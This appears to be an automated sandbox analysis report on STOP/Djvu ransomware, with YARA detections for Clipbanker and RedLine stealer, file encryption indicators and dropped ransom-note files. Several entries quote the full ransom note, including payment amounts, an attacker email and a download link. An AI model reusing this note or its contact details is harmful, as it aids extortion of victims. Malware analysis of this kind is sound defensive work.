Source: Yara match	File source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 1020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 2004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File moved: C:\Users\user\Desktop\ONBQCLYSPU.png	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File deleted: C:\Users\user\Desktop\ONBQCLYSPU.png	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File moved: C:\Users\user\Desktop\DTBZGIOOSO.pdf	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File deleted: C:\Users\user\Desktop\DTBZGIOOSO.pdf	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File moved: C:\Users\user\Desktop\NHPKIZUUSG\VLZDGUKUTZ.mp3	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;h	Jump to dropped file
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99367895039	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99551629943	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99602097722	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99204680961	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99715221672	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99672213188	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma entropy: 7.99054781149	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm entropy: 7.99001752427	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99832563624	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99840398262	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99799287351	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133584016293449682.txt entropy: 7.99828105605	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945531046117.txt entropy: 7.99834776522	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99852848763	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99854330269	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99848897147	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99837321246	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99882269353	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99875628839	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99744672873	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99715807332	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.9942428555	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99852513009	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99527072813	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99784991362	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct150C.tmp.bgzq (copy) entropy: 7.99745307849	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct33D7.tmp.bgzq (copy) entropy: 7.99740082019	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct38F0.tmp.bgzq (copy) entropy: 7.99720583359	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct443C.tmp.bgzq (copy) entropy: 7.99707334731	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.bgzq (copy) entropy: 7.99746613624	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.bgzq (copy) entropy: 7.99752768618	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.bgzq (copy) entropy: 7.9971905801	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.bgzq (copy) entropy: 7.99758480291	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.bgzq (copy) entropy: 7.99771158675	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctF411.tmp.bgzq (copy) entropy: 7.99713246377	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgzq (copy) entropy: 7.99204680961	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgzq (copy) entropy: 7.99715221672	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgzq (copy) entropy: 7.99672213188	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Microsoft\Edge\User Data\CrashpadMetrics-active.pma.bgzq (copy) entropy: 7.99054781149	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm entropy: 7.99428559508	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000002.1752670364.0000000001ADE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001F.00000002.3619043820.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.3032813684.0000000000A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.1981826365.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.4080039509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2386525416.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.1804523922.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.1879406390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2065195987.000000000446D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
